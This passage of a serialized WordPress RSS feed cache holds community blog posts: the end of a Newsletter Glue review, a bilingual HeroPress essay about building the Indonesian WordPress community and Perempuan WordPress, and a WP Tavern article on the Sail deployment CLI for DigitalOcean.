theme instead of hunting down hex codes or eyeballing it from a color picker.</p>\n\n\n\n<p>Overall, I like what the Newsletter Glue team has built thus far. It is no small feat to put together such a well-rounded project of this size in just over a year. I look forward to seeing it evolve over time.  For now, I am laying out ideas for the return of my family newsletter thanks to the Newsletter Glue team.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 16 Sep 2021 00:54:11 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Justin Tadlock\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:13;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:141:\"HeroPress: WordPress and Me: Am I Going Against All Odds? – WordPress dan Saya: Apakah saya dapat melewati semua rintangan yang menghadang?\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:56:\"https://heropress.com/?post_type=heropress-essays&p=4108\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:162:\"https://heropress.com/essays/wordpress-and-me-am-i-going-against-all-odds/#utm_source=rss&utm_medium=rss&utm_campaign=wordpress-and-me-am-i-going-against-all-odds\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:24537:\"<img width=\"1024\" height=\"512\" src=\"https://heropress.com/wp-content/uploads/2021/09/091421-min.jpg\" class=\"attachment-large size-large wp-post-image\" alt=\"Pull quote: In my late 30’s, I threw myself into a new world.\" /><p><a href=\"https://heropress.com/feed/#indonesian\">Esai ini juga tersedia dalam bahasa Indonesia.</a></p>\n<p>It is not that hard to fall for WordPress if you have a chance to experience WordPress. For me, it took a WordCamp.</p>\n<p>To make it fancy, in 2016, I was volunteering impromptu at WordCamp Denpasar in Bali, the island of Gods. To note, Bali is a tiny island in a country called Indonesia. Yes, it’s where I’m from. So, if you read this, you know how powerful WordCamp is. It may bring people who will give back to the community, even if they don’t get anything from WordCamp. (Well, perhaps a t-shirt, a lanyard and free hotel meals)</p>\n<p>My journey with WordPress started from one WordCamp to the next. It gets fancier. The next one was WordCamp Ubud, still in Bali. This time, I was organizing. Ubud is one of the hottest hotspots for digital nomads in Asia. A beautiful place, especially if you are also into nature, yoga and some enlightenment. I’m not kidding. If WordPress does not enlighten you enough, go to Ubud. You will feel some kind of strong energy to connect to everything. Bali is magical, so is everything in it. It is a perfect environment to meet with new people who share the same interests, especially at a WordPress event such as WordCamp or Meetup.</p>\n<a href=\"https://heropress.com/wp-content/uploads/2021/09/wc_denpasar_-_rocio_v-min.jpeg\"><img /></a>Volunteering at WordCamp Denpasar 2016 with Kharis Sulistiyono (volunteer) and Niels Lange (organizer). Photo Credit: Rocio Valdivia\n<p>Then, I started attending WordPress Meetups in Ubud and Jakarta. I also organized more WordCamps. WordCamp Jakarta in 2017 and 2019. But only later, I made a new commitment as a Meetup organizer in Jakarta and Ubud. Before Covid happened, I was travelling back and forth between Jakarta and Ubud. Whenever I went to Ubud, organizing Meetup was the first thing on my list. I was also taking part in organizing WordCamp Asia 2020. Hopefully, it will eventually take place after everything in the world with Covid gets safer for us to travel and meet in person.</p>\n<p>At WordCamps and Meetups, you heard stories about how WordPress powers the web. How it changes the lives of so many people. How it helps dreams come true. I was thinking. If WordPress was that powerful, why are there not many people in Indonesia using websites, and why don&#8217;t they use WordPress. Why are there not many people who use WordPress in Indonesia contributing to WordPress? Why are there not many talented Indonesian WordPress users, developers, designers, business owners taking part in WordPress.org projects. Why? My guess is one of the many reasons, a language issue.</p>\n<p>I believe, the more content translated into Indonesian, the more Indonesian WordPress users see WordPress as more than just a blogging platform or a CMS. Instead, it’s a huge open source community that work together to make the web a better place. The more plugins and themes translated the easier the work of the developer and designer will be with WordPress. The more people see how WordPress can benefit their life, the better the business ecosystem for business owners becomes.</p>\n<a href=\"https://heropress.com/wp-content/uploads/2021/09/wc_ubud_-_hubud-min.jpeg\"><img /></a>Organizing at WordCamp Ubud 2017 with Pramana Adi Putra dan Wahyu Taufiq. Photo Credit: Hubud\n<p>After several asking around and discussions about translating WordPress, suddenly I made a commitment to revive the polyglot project in Indonesia. I was lucky, there was a community member who came forward to help. Then, with a lot of promotion, the team got bigger. It’s good to know I am not alone. There are WordPress users interested in translating.</p>\n<p>I didn’t stop there. I noticed that there are not many women involved in the WordPress community in Indonesia. I did meet a few women at WordCamps or Meetups, but the number is too small. And most of the time, I was the only woman. Perhaps I overlooked the fact that Indonesia is still highly patriarchal despite the economic boom. The WordPress community in Indonesia feels almost like a male-dominated community.</p>\n<a href=\"https://heropress.com/wp-content/uploads/2021/09/wordcamp_jakarta_2019-min.jpg\"><img /></a>Organizing at WordCamp Jakarta 2019\n<p>Then after some discussions with a couple of community members, I initiated Perempuan WordPress. There are two words for women in Indonesian, ‘wanita’ and ‘perempuan’. I chose ‘perempuan’ as I like to think that it is not merely referring to women sexually but more importantly about the role that the female human can have. It feels more empowering to me. Don’t ask me about the formal translation of ‘perempuan’ in Indonesian though. It’s pretty sad.</p>\n<p>A community member also came forward to help. She wanted to organize an online meetup on Telegram. It is open for everyone to join but we prioritize women to speak, although our first speaker was a man. It was quite challenging to look for female speakers, even using Perempuan WordPress as a platform. I could not even convince my co-organizer to speak!</p>\n<a href=\"https://heropress.com/wp-content/uploads/2021/09/wcasia_2020_organizers_in_wceu_2019_-_wceu-min.jpeg\"><img /></a>WCAsia 2020 Organizers in WCEU 2019. Photo Credit: WCEU 2019\n<p>I once had a chat with someone who spoke at WordCamp Jakarta and was a successful business owner. I asked why she was not active in a WordPress forum on Facebook, perhaps answering a question, as she is listed as a member. Facebook and Telegram are the two platforms where most Indonesian WordPress users go to ask for support. She said that it was too scary to receive condescending replies from the male members. She was afraid the comments would bring her down. To date, I am still looking for Indonesian WordPress users who share the same interest in building Perempuan WordPress.</p>\n<p>But, what did I actually do with WordPress before I started contributing? If you mean whether I code? No, I don’t. I suck in math. I’m super slow in getting my head around code.</p>\n<p>Well, in 2014, I signed up for a free account on WordPress.com. I was commuting for work and when I was on public transport my mind wandered. I thought of keeping a note about whatever I see and let the public read it. I was not aware it was called blogging. I did subscribe but the blog never materialized.</p>\n<a href=\"https://heropress.com/wp-content/uploads/2021/09/meetup_ubud-min.jpeg\"><img /></a>WordPress Meetup Ubud before Covid-19\n<p>My background is environmental activism. I worked for international development organizations on environmental issues, from policymaking to campaigning. I worked with policymakers behind the desk and organized conferences and meetings. There was a lot of writing and translating involved. I also worked with people on the ground. The people who are impacted by the policies. My work on the ground usually involved researching, movement building and community empowerment.</p>\n<p>Perhaps, now you understand why I was easily involved in WordCamps or Meetups. The talent in organizing and working with people is almost like in my genes. They run in my blood veins. I enjoy working to make things happen and get things done. I am also very much comfortable working with people, especially speaking about something that I am passionate about and would make a positive impact on someone’s life.</p>\n<a href=\"https://heropress.com/wp-content/uploads/2021/09/meetup_jakarta-min.jpg\"><img /></a>WordPress Meetup Jakarta before Covid-19\n<p>Then, at some point, I was in between jobs. The person who convinced me into volunteering at WordCamp Denpasar created an online CV for me. I was pushed to learn to manage a WordPress site, navigate around wp-admin, and work on the content to appeal to potential employers. I don’t remember which one came first, but I eventually got a job as a campaigner to build a movement online and offline.</p>\n<p>The movement was initiated by a bunch of university friends in America who used digital campaigns to go global. The campaign used WordPress as the platform. I was working with a digital campaigner. Not only I had to take part in decision making about the content, the Call to Action, the user experience, I also had to log in to wp-admin and make some amendments. As it was a global movement, the resources were developed in English. So I also worked a lot with translators and reviewed their work.</p>\n<a href=\"https://heropress.com/wp-content/uploads/2021/09/wptd_2020-min.jpg\"><img /></a>First WordPress Translation Day for Indonesia Polyglot Team in 2020\n<p>And now, you probably understand even more why I am getting my hands dirty with polyglots and Perempuan WordPress. Everything comes from the heart. I do things that I feel so strongly about. Things that call me. And things that I am good at but still giving me room to learn and become better at.</p>\n<p>Some people might think, I can do what I do because I have time. That is true. I quit my job as a campaigner at the end of 2018. Since then, I’ve been freelancing. Not much, hence the free time I spend contributing. But I have another initiative that I started once I quit my job and have kept me going. Of course, it also involves WordPress. The initiative aims at helping street cats in Jakarta. So, I am busy trapping cats but also learning how to fundraise using a website. I’m learning to use online forms, set up a payment service provider, work on SEO, and do other new things I need to learn to grow my initiative. I do have the privilege to learn directly from a personal guru. Yes, the same person who convinced me to volunteer at WordCamp Denpasar, and my personal web developer. My husband.</p>\n<a href=\"https://heropress.com/wp-content/uploads/2021/09/perempuanwp-min.jpg\"><img /></a>Call for Speakers Poster for Perempuan WordPress. Photo Credit: Hani Khaerunnisa\n<p>Although, it’s not always rosy in my part of the world. When I just started learning to become a Deputy, and I was ready to support meetups in new cities across Indonesia and perhaps a WordCamp. Something related to WordPress had brought me down for more than half a year (thanks to Covid as well). I locked myself away from contributing to WordPress. It didn’t feel right though. It felt as if something was missing. But now, I have decided to not let it get in my way anymore. This not-so-rosy situation is perhaps what motivates me the most to keep contributing to WordPress. What does not kill me makes me stronger!</p>\n<p>And that’s what I like about WordPress, it is very welcoming and open to people like me, who don’t code at all. At the same time, it shows me a different way of looking at the world, if not the IT world. In my late 30’s, I threw myself into a new world. I pushed myself to learn new things. With WordPress, the chance to learn new things is always there for everyone. WordPress also allows me to contribute, to share what I have. By contributing, I hope to make a difference in someone’s life. Especially the talented Indonesian WordPress users. I hope they feel the benefit of using WordPress and want to give back to create a healthier WordPress community in Indonesia.</p>\n<h1 id=\"indonesian\">WordPress dan Saya: Apakah saya dapat melewati semua rintangan yang menghadang?</h1>\n<p>Tidak sulit untuk jatuh cinta pada WordPress jika Anda memiliki kesempatan untuk mengenalnya. Saya hanya membutuhkan sebuah WordCamp.</p>\n<p>Tidak hanya WordCamp di tempat biasa, pada tahun 2016, saya menjadi sukarelawan dadakan di WordCamp Denpasar di Bali, pulau Dewata. Bali adalah pulau kecil di dalam sebuah negara bernama Indonesia. Ya, saya dari Indonesia. Jadi, jika Anda membaca esai saya, Anda mungkin dapat memahami betapa hebatnya WordCamp. Sebuah kegiatan yang dapat memikat seseorang untuk berkontribusi untuk komunitas, bahkan jika mereka tidak mendapatkan apa pun dari WordCamp. (saya sebenarnya dapat kaos, lanyard, dan makanan hotel gratis)</p>\n<p>Perjalanan saya dengan WordPress dimulai dari satu WordCamp ke WordCamp berikutnya. Semakin luar biasa karena WordCamp berikutnya adalah WordCamp Ubud, masih di Bali. Kali ini saya menjadi salah satu penyelenggara (organizer). Ubud adalah salah satu lokasi yang paling diminati oleh digital nomad di Asia. Tempat yang indah, terutama jika Anda juga menyukai alam, yoga, dan ingin mendapatkan pencerahan. Saya tidak bercanda. Jika WordPress tidak cukup mencerahkan Anda, pergilah ke Ubud. Anda akan merasakan semacam energi yang kuat untuk terhubung ke semua hal. Pulau Bali sangat penuh keajaiban, begitu juga semua di dalamnya. Ubud adalah lingkungan yang sempurna untuk bertemu dengan orang baru yang memiliki minat yang sama, terutama di acara WordPress seperti WordCamp atau Meetup.</p>\n<a href=\"https://heropress.com/wp-content/uploads/2021/09/wc_denpasar-min.jpeg\"><img /></a>WordCamp Denpasar 2017\n<p>Kemudian, saya mulai menghadiri WordPress Meetup di Ubud dan Jakarta. Saya juga menyelengarakan lebih banyak WordCamp. WordCamp Jakarta di tahun 2017 dan 2019. Akan tetapi, baru setelah beberapa waktu saya berkomitmen sebagai organizer Meetup di Jakarta dan Ubud. Sebelum Covid terjadi, saya sering bepergian hilir mudik antara Jakarta dan Ubud. Setiap kali saya pergi ke Ubud, Meetup adalah hal pertama dalam daftar kegiatan saya selama di Ubud. Saya juga ikut ambil bagian dalam penyelenggaraan WordCamp Asia 2020. Mudah-mudahan WordCamp Asia akhirnya dapat diadakan setelah dunia semakin aman bagi kita untuk bepergian dan mengadakan pertemuan, walaupun Covid masih diperangi.</p>\n<p>Di WordCamp dan Meetup, Anda mendengar cerita tentang kekuatan WordPress yang menghidupi web. Tentang WordPress mengubah hidup banyak orang. Tentang WordPress membantu mewujudkan mimpi menjadi kenyataan. Saya berpikir. Jika WordPress sehebat itu, mengapa tidak banyak orang di Indonesia yang menggunakan situs web, dan mengapa mereka tidak menggunakan WordPress. Mengapa tidak banyak orang yang menggunakan WordPress di Indonesia berkontribusi pada WordPress. Mengapa tidak banyak pengguna, developer, desainer, pemilik bisnis WordPress Indonesia yang berbakat mengambil bagian dalam proyek WordPress.org. Mengapa? Dugaan saya, salah satu dari banyak alasan adalah masalah bahasa.</p>\n<p>Saya percaya, semakin banyak konten yang diterjemahkan ke dalam bahasa Indonesia, semakin banyak pengguna WordPress Indonesia yang melihat WordPress lebih dari sekadar platform blogging atau CMS. Sebaliknya, WordPress adalah komunitas open source yang sangat besar, tempat banyak kontributor bekerja sama untuk membuat web menjadi tempat yang lebih baik bagi semua. Semakin banyak plugin dan tema yang diterjemahkan, semakin mudah pekerjaan developer dan desainer dengan WordPress. Semakin banyak orang merasakan manfaat WordPress bagi kehidupan mereka, semakin baik ekosistem bisnis bagi pemilik bisnis.</p>\n<a href=\"https://heropress.com/wp-content/uploads/2021/09/wc_ubud_-_ivan_k_-min.jpeg\"><img /></a>WordCamp Ubud 201<b>7</b>\n<p>Setelah banyak bertanya dan berdiskusi dengan banyak orang tentang menerjemahkan WordPress, saya segera berkomitmen untuk menghidupkan kembali proyek poliglot di Indonesia. Saya beruntung, seseorang anggota komunitas datang membantu. Kemudian, dengan melakukan beberapa kali promosi, tim poliglot bertambah. Saya bersyukur, saya tidak sendirian. Banyak pengguna WordPess yang tertarik untuk berkontribusi dalam penerjemahan.</p>\n<p>Saya tidak berhenti di situ. Saya perhatikan, tidak banyak perempuan yang terlibat dalam komunitas WordPress di Indonesia. Saya bertemu dengan beberapa perempuan di WordCamp atau Meetup, tetapi jumlahnya tidak banyak. Dan biasanya, saya adalah satu-satunya perempuan. Mungkin saya mengabaikan fakta bahwa Indonesia masih sangat kuat perilaku patriarkinya meskipun ekonominya semakin kuat. Komunitas WordPress di Indonesia hampir seperti komunitas yang didominasi laki-laki.</p>\n<p>Setelah berdiskusi dengan beberapa anggota komunitas, saya memulai sebuah inisiatif yang disebut Perempuan WordPress. Ada dua kata dalam bahasa Indonesia, &#8216;wanita&#8217; dan &#8216;perempuan&#8217;. Saya memilih &#8216;perempuan&#8217; karena saya merasa bahwa perempuan tidak hanya mengacu pada perbedaan jenis kelamin tetapi lebih tentang peran yang dapat dimiliki oleh seorang perempuan. Saya merasa ‘perempuan” dapat lebih menguatkan saya. Tetapi jangan tanya saya tentang terjemahan formal &#8216;perempuan&#8217; dalam bahasa Indonesia. Karena menurut saya terjemahannya sangat menyedihkan.</p>\n<p>Seorang kontributor perempuan bersedia membantu dan mengusulkan untuk mengadakan pertemuan rutin online di Telegram (Kulgram). Kulgram terbuka bagi siapa saja untuk bergabung tetapi wanita diutamakan untuk menjadi pemateri, meskipun pembicara pertama Kulgram adalah seorang laki-laki. Mencari pembicara perempuan bukan hal yang mudah, meskipun menggunakan platform Perempuan WordPress. Saya bahkan tidak dapat meyakinkan rekan kontributor penyelenggara Kulgram untuk berbicara!</p>\n<a href=\"https://heropress.com/wp-content/uploads/2021/09/wc_jakarta_2019-min-scaled.jpg\"><img /></a>WordCamp Jakarta 2019\n<p>Saya pernah berbicara dengan seorang perempuan pemateri di WordCamp Jakarta yang juga merupakan pemilik bisnis yang sukses. Saya bertanya alasannya tidak aktif di forum WordPress di Facebook, misalnya dengan menjawab pertanyaan sebagai anggota. Facebook dan Telegram adalah dua platform tempat sebagian besar pengguna WordPress Indonesia bertanya jawab teknis tentang WordPress. Dia mengatakan bahwa berkomentar di forum semacam Facebook terlalu menakutkan jika muncul balasan yang merendahkan dari anggota forum laki-laki. Dia tidak ingin komentar yang merendahkan akan membuatnya terpuruk. Sampai saat ini, saya masih mencari pengguna WordPress dari Indonesia yang memiliki minat yang sama untuk membangun Perempuan WordPress.</p>\n<p>Tapi, apa yang sebenarnya saya lakukan dengan WordPress sebelum saya mulai berkontribusi? Jika Anda bertanya apakah saya dapat menulis kode? Tidak. Saya payah dalam matematika. Saya sangat lambat dalam memahami kode. Pada tahun 2014, saya mendaftar untuk mendapatkan akun gratis di WordPress.com. Saya naik transportasi umum ke kantor setiap hari dan di tengah-tengah kemacetan kadang pikiran saya mengembara. Saya berpikir untuk menulis tentang semua yang saya lihat dan pikirkan lalu memublikasikannya. Saya tidak sadar hal ini disebut blogging. Saya masih berlangganan di WordPress.com tetapi blog yang aktif tidak pernah terwujud.</p>\n<p>Latar belakang saya adalah aktivis lingkungan. Saya bekerja untuk organisasi bantuan internasional tentang isu-isu lingkungan, mulai dari pembuatan kebijakan hingga kampanye. Saya bekerja dengan pembuat kebijakan di belakang meja dan mengadakan konferensi dan pertemuan. Saya banyak menulis laporan dan menerjemahkan. Saya juga bekerja dengan banyak orang di lapangan. Mereka yang terkena dampak kebijakan. Pekerjaan saya di lapangan biasanya melibatkan penelitian, membangun gerakan dan memberdayakan masyarakat.</p>\n<a href=\"https://heropress.com/wp-content/uploads/2021/09/online_meetup_jakarta-min.jpg\"><img /></a>WordPress Jakarta Meetup Online di StreamYard\n<p>Mungkin sekarang Anda mengerti mengapa saya mudah terlibat dalam WordCamp atau Meetup. Bakat dalam menyiapkan sebuah kegiatan dan bekerja dengan banyak orang mungkin seperti bakat alami saya yang mengalir di pembuluh darah saya. Saya senang bekerja untuk mewujudkan dan menyelesaikan sesuatu. Saya juga sangat nyaman bekerja dengan banyak orang, terutama berbicara tentang sesuatu yang saya minati dan dapat memberi dampak positif pada kehidupan seseorang.</p>\n<p>Kemudian, pada titik tertentu, saya harus mencari pekerjaan. Seseorang yang meyakinkan saya untuk menjadi sukarelawan di WordCamp Denpasar membuat CV online untuk saya. Saya didorong untuk belajar mengelola situs WordPress, menjelajahi wp-admin, dan mengerjakan konten untuk menarik calon pemberi kerja. Saya tidak ingat mana yang lebih dulu terwujudkan, tetapi akhirnya saya mendapat pekerjaan sebagai juru kampanye untuk membangun gerakan secara online dan offline.</p>\n<p>Gerakan tersebut diprakarsai oleh sekelompok anak muda di universitas di Amerika yang menggunakan kampanye digital agar tersebar ke seluruh dunia. Kampanye tersebut menggunakan WordPress sebagai platformnya. Saya bekerja dengan seorang juru kampanye digital. Tidak hanya saya harus mengambil bagian dalam pengambilan keputusan tentang konten, Call to Action, dan pengalaman pengguna, saya juga harus login ke wp-admin dan membuat beberapa perubahan. Karena gerakan tersebut adalah gerakan global, sumber daya yang disusun biasanya dalam bahasa Inggris. Jadi saya juga banyak bekerja dengan penerjemah dan meninjau pekerjaan mereka.</p>\n<p>Sekarang, Anda mungkin lebih mengerti mengapa saya bersusah payah mengembangkan proyek poliglot dan Perempuan WordPress. Semuanya datang dari hati. Saya melakukan hal-hal yang saya yakini. Hal-hal yang menarik minat saya. Dan hal-hal yang saya kuasai tetapi masih memberikan ruang untuk saya belajar dan menjadi lebih baik.</p>\n<a href=\"https://heropress.com/wp-content/uploads/2021/09/id_-_wptd_2020-min.jpg\"><img /></a>Organizers (Polyglots GTE) WPTD 2020 Indonesia. Photo Credit: Agus Muhammad\n<p>Beberapa orang mungkin berpikir, saya bisa melakukan apa yang saya lakukan sekarang karena saya punya waktu. Mungkin benar. Saya berhenti dari pekerjaan saya sebagai juru kampanye pada akhir tahun 2018. Sejak saat itu, saya menjadi pekerja lepas. Tidak banyak yang saya lakukan, maka saya punya waktu luang untuk berkontribusi. Tetapi saya memiliki inisiatif lain yang saya mulai setelah saya berhenti dari pekerjaan saya dan membuat saya terus berkegiatan. Tentu saja, inisiatif tersebut juga melibatkan WordPress. Inisiatif tersebut bertujuan untuk membantu kucing jalanan di Jakarta. Jadi, saya sibuk menangkap kucing-kucing jalanan tetapi juga belajar cara menggalang dana menggunakan situs web. Saya belajar menggunakan formulir online, menyiapkan penyedia layanan pembayaran, mengerjakan SEO, dan melakukan hal-hal baru lainnya yang perlu saya pelajari untuk mengembangkan inisiatif saya. Saya mungkin beruntung karena dapat belajar langsung dari seorang guru pribadi. Orang yang sama yang meyakinkan saya untuk menjadi sukarelawan di WordCamp Denpasar, dan developer web pribadi saya. Suami saya.</p>\n<p>Akan tetapi, semuanya tentu bukan tanpa tantangan. Ketika saya baru mulai belajar menjadi Deputi, dan saya siap untuk mendorong dimulainya Meetup di kota-kota baru di seluruh Indonesia dan mungkin WordCamp. Sesuatu yang berhubungan dengan WordPress telah membuat saya berhenti berkontribusi selama lebih dari setengah tahun (juga karena Covid). Saya sadar hal ini tidak benar. Saya merasa seperti ada sesuatu yang hilang. Tetapi sekarang, saya telah memutuskan untuk tidak membiarkannya menghalangi saya lagi. Situasi yang tidak terlalu menyenangkan tersebut mungkin yang paling memotivasi saya untuk terus berkontribusi di WordPress. Apa yang tidak membunuh kita hanya akan membuat diri kita lebih kuat!</p>\n<p>Semua hal di atas adalah yang saya sukai dari WordPress, sangat ramah dan terbuka untuk orang seperti saya, yang tidak bisa menulis kode sama sekali. Pada saat yang sama, WordPress menunjukkan kepada saya cara yang berbeda dalam memandang dunia, mungkin juga dunia TI. Di usia 30-an akhir, saya terjun ke dunia baru. Saya dorong diri saya untuk mempelajari hal-hal baru. Dengan WordPress, kesempatan untuk mempelajari hal baru selalu terbuka bagi siapa pun. Dan WordPress juga memungkinkan saya untuk berkontribusi dengan membagikan apa yang saya miliki. Dengan berkontribusi, saya berharap dapat membuat perbedaan dalam hidup seseorang. Terutama para pengguna WordPress berbakat dari Indonesia. Saya berharap mereka merasakan manfaat menggunakan WordPress dan ingin berkontribusi untuk menciptakan komunitas WordPress yang lebih sehat di Indonesia.</p>\n<p>The post <a rel=\"nofollow\" href=\"https://heropress.com/essays/wordpress-and-me-am-i-going-against-all-odds/\">WordPress and Me: Am I Going Against All Odds? &#8211; WordPress dan Saya: Apakah saya dapat melewati semua rintangan yang menghadang?</a> appeared first on <a rel=\"nofollow\" href=\"https://heropress.com\">HeroPress</a>.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 15 Sep 2021 01:00:22 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Devin Maeztri\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:14;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:87:\"WPTavern: Konstantin Kovshenin Launches Sail, a CLI Tool for Deploying to Digital Ocean\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=122774\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:217:\"https://wptavern.com/konstantin-kovshenin-launches-sail-a-cli-tool-for-deploying-to-digital-ocean?utm_source=rss&utm_medium=rss&utm_campaign=konstantin-kovshenin-launches-sail-a-cli-tool-for-deploying-to-digital-ocean\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:4729:\"<p class=\"has-drop-cap\">Last week, Konstantin Kovshenin launched <a href=\"https://sailed.io/\">Sail</a>, a CLI tool for deploying WordPress applications to the DigitalOcean cloud. The project is free to use and open source. However, he has plans for an upgraded premium experience down the road.</p>\n\n\n\n<p>Kovshenin cited speed and efficiency as the two primary reasons developers should give his new tool a try. &ldquo;You don&rsquo;t need to wander around web UIs to launch a new server and install WordPress. You just <code>sail init</code>. You don&rsquo;t need to open your SFTP GUI client to upload changes to your application. You just <code>sail deploy</code>.&rdquo;</p>\n\n\n\n<p>He also said that because it is a simple CLI, it will integrate well with existing developer tools and services like Gulp, webpack, GitHub Actions, and more.</p>\n\n\n\n<p>&ldquo;I&rsquo;m a DIY guy when it comes to WordPress hosting, so I like to get my hands dirty with servers, code, configuration, and everything else,&rdquo; wrote Kovshenin in the <a href=\"https://konstantin.blog/2021/sail-deploy-wordpress-to-digitalocean/\">announcement post</a>. &ldquo;I&rsquo;ve been using virtual servers at DigitalOcean for small WordPress projects for a very long time, and it&rsquo;s great, and also very affordable.&rdquo;</p>\n\n\n\n<p>He had grown annoyed doing routine maintenance and configuring servers for new projects. This led him to write many scripts for handling each piece of this over the years. Over the past couple of months, he cleaned them up and packaged them as a single CLI tool called Sail. It works across Linux, macOS, and Windows.</p>\n\n\n\n<p>While he lists some advantages of using Sail over the competition in the announcement post, he thinks the benefits come from using Sail with other developer tools.</p>\n\n\n\n<p>&ldquo;For example, if you already use Git and GitHub, Sail can automatically deploy your application whenever you push to your main branch,&rdquo; he said. &ldquo;If your project is built with Gulp and webpack, you can ask npm to deploy your application after a successful build.&rdquo;</p>\n\n\n\n<p>The CLI tool does not make assumptions about the development environment. Developers are free to use whatever setup they are accustomed to, such as Vagrant/VirtualBox, XAMP/MAMP, Local, Docker, or a custom setup.</p>\n\n\n\n<p>&ldquo;You can use it without a local development environment at all and just cowboy-code your way through, and Sail will help you deploy with confidence and roll back when you&rsquo;re overly confident,&rdquo; he said.</p>\n\n\n\n<p>The following is a short video demo:</p>\n\n\n\n<div class=\"wp-block-embed__wrapper\">\n\n</div>\n\n\n\n<h2>The Future of Sail</h2>\n\n\n\n<p class=\"has-drop-cap\">For the short term, Sail only works with DigitalOcean. However, Kovshenin plans to support more providers down the road as he looks into &ldquo;more complex architectures.&rdquo; However, he said it is not a high priority at the moment.</p>\n\n\n\n<p>&ldquo;DigitalOcean has the best documentation, hands down,&rdquo; he said. &ldquo;The simplicity of their APIs just blows you away. And that simplicity extends to their pricing as well, which made it quite an obvious choice.&rdquo;</p>\n\n\n\n<p>While the tool is free, he will offer a Sail Premium service. There is currently no launch date for it. Kovshenin said he was gauging overall interest before diving in. However, he does have an Early Access signup form. Those who use it will gain free passes during the beta period and possibly a discount at launch.</p>\n\n\n\n<p>Right now, his focus is on building the core Sail features, which he says will always be free.</p>\n\n\n\n<p>&ldquo;The biggest new feature I&rsquo;m excited about right now is Blueprints,&rdquo; said Kovshenin. &ldquo;This is going to be a YAML manifest file, which will describe the desired application environment and state, including which WordPress plugins to install and activate, which themes and settings, as well as any additional server software and configuration, such as mail, firewall, etc. And to get all of this you&rsquo;ll just need to specify the blueprint file to <code>sail init</code>.&rdquo;</p>\n\n\n\n<p>The goal is to allow users to build, reuse, and even share their blueprints. Sail itself will even make common configurations available. A single blueprint could include WooCommerce, Stripe, Storefront, Jetpack, Redis object caching, mail relay via MailGun, and more.</p>\n\n\n\n<p>&ldquo;Other features on the list include sub-projects, staging/cloning, automatic and remote backups, profiling, monitoring, and malware/vulnerability scanning,&rdquo; said Kovshenin.</p>\n\n\n\n<p>He is hoping for more feedback on missing features that could make the project more useful for others.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 14 Sep 2021 22:21:55 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Justin Tadlock\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:15;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	